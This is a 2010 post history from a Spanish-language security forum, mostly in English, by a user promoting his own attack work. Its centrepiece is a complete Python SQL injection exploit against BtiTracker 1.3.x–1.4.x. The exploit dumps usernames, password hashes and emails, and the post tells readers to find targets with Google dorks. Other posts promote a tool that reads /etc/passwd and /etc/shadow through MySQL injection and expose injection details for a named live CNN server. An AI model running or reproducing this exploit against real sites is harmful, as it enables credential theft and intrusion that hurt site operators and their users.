Mostrar Mensajes
Páginas: [1 ] 2
1
Seguridad Informática / Bugs y Exploits / Re: BtiTracker 1.3.x - 1.4.x [EXPLOIT]
en: 11 Junio 2010, 15:16 pm
What it does exactly? Cheers
Exploit for BtiTracker CMS.
Find one [google dorks, allinurl:"BtiTracker 1.4", inurl:"reqdetails.php" & intext:"BtiTracker", etc], and type in cmd / terminal:
python isr.py http://www.site.com [Number] ./isr.py isr.py http://www.site.com [Number] And if it's vulnerable, you'll get the Username, Password [hash], and Email.
2
Seguridad Informática / Bugs y Exploits / BtiTracker 1.3.x - 1.4.x [EXPLOIT]
en: 10 Junio 2010, 02:02 am
BtiTracker 1.3.x - 1.4.x [EXPLOIT]
More HERE:
http://blog.insecurity.ro/btitracker-1-3-x-1-4-x-exploit-tinkode/ #!/usr/bin/env python # ################################################################################ # ______ ____ __ [ xpl0it ] # #/\__ _\ /\ _`\ __/\ \__ # #\/_/\ \/ ___\ \,\L\_\ __ ___ __ __ _ __ /\_\ \ ,_\ __ __ # # \ \ \ /' _ `\/_\__ \ /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \ # # \_\ \__/\ \/\ \/\ \L\ \/\ __//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ # # /\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\ \ \_\ \__\\/`____ \ # # \/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/ \/_/ \/_/\/__/ `/___/> \ # # _________________ /\___/ # # www.insecurity.ro \/__/ # # # ################################################################################ # [ BtiTracker 1.3.X - 1.4.X Exploit ] # # Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches # # Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff # ################################################################################ # Because we care, we're security aware # ################################################################################ import sys, urllib2, re if len(sys.argv) < 2: print "===============================================================" print "============== BtiTracker 1.3.X - 1.4.X Exploit ===============" print "===============================================================" print "= Discovered and coded by TinKode =" print "= www.InSecurity.ro =" print "= =" print "= Local Command: =" print "= ./isr.py [http://webshit] [ID] =" print "= =" print "===============================================================" exit() if len(sys.argv) < 3: id = 1 else: id = sys.argv[2] shit = sys.argv[1] if shit[-1:] != "/": shit += "/" url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\ concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\ ,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--" print "\n" print "=============================================" print "================= InSecurity ================" print "=============================================" html = urllib2.urlopen(url).read() slobod = re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html) if len(slobod) > 0: print "ID : " + str(id) print "Username : " + slobod[0][0] print "Password : " + slobod[0][1] print "EMail : " + slobod[0][2] print "=============================================" print "================= InSecurity ================" print "=============================================" else: print "Ai luat-o la gaoaza..." #InSecurity.ro - Romania
7
Seguridad Informática / Nivel Web / ISR SQL SunBurn – ISS
en: 27 Mayo 2010, 14:24 pm
Description :
This is the alpha (testing) version of ISR SQL SunBurn – ISS.
The final version will contain more stuff, but it will remain private, this doesn’t mean that we won’t create a public version.
So what does ISR SQL SunBurn (ISS) do ? ISS is a php script that extracts all the possible information from a MySQL injection. Info (here we I don’t refer to colons/tables/etc … maybe in the near future). It searches and loads over 350 files with the help of load_file() – (ex /etc/passwd, /etc/shadow, etc)
Why did we decide to build this “tool”? It’s actually simple, it simplifies your work, and second of all, it’s a necessity.
Hope I didn’t bore you with the description, here’s the video presentation of it.
Video Demonstration Here :
VIDEO Mirror HIGH QUALITY:
http://www.trilulilu.ro/InSecurity/153a786f8b20fd Source :
http://insecurity.ro/blog/isr-sql-sunburn-iss/ and I think, I posted in the right section (i don't know)
8
Seguridad Informática / Nivel Web / Re: ESET NOD32 Taiwan & Hong Kong
en: 22 Marzo 2010, 14:02 pm
y que tenga bug sqli no es lo peor no puede ser que tenga todo en texto plano! en el segundo link hay un link a otro bug mas en otra pagina de eset realmente cada dia dudo mas de la gente de eset y su supuesta seguridad... saludos
I can't understand what you say with google translate!
)
You can speak in english?
10
Seguridad Informática / Nivel Web / CNN Oracle SQL Injection
en: 17 Febrero 2010, 22:49 pm
CNN Oracle SQL Injection
CNN vulnerable to SQL Injection CNN
Vulnerable to Oracle Injection #TinKode & skpx
CNN.com is among the world’s leaders in online news and information delivery. Staffed 24 hours, seven days a week by a dedicated staff in CNN’s world headquarters in Atlanta, Georgia, and in bureaus worldwide, CNN.com relies heavily on CNN’s global team of almost 4,000 news professionals. CNN.com features the latest multimedia technologies, from live video streaming to audio packages to searchable archives of news features and background information. The site is updated continuously throughout the day.
Website vulnerable:
cgi.money.cnn.com Informations:
Version : Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production
Main Database : MONEYP1.TURNER.COM
User : TIME_USR
Owner : SYS
Columns from “
Time_Owner.F500_2009 “:
[1] RANK [2] COMPANY_ID [3] NAME [4] REVENUE [5] REVENUE_GROWTH [6] PROFIT [7] PROFIT_GROWTH [8] PROF_PCT_REVENUE [9] PROF_PCT_ASSETS [10] PROF_PCT_EQUITY [11] EPS_10YR_GROWTH [12] TRI_10YR [13] TRI [14] EMPLOYEES [15] EMPLOYEE_GROWTH
# Thanks, and have a nice day!
# TinKode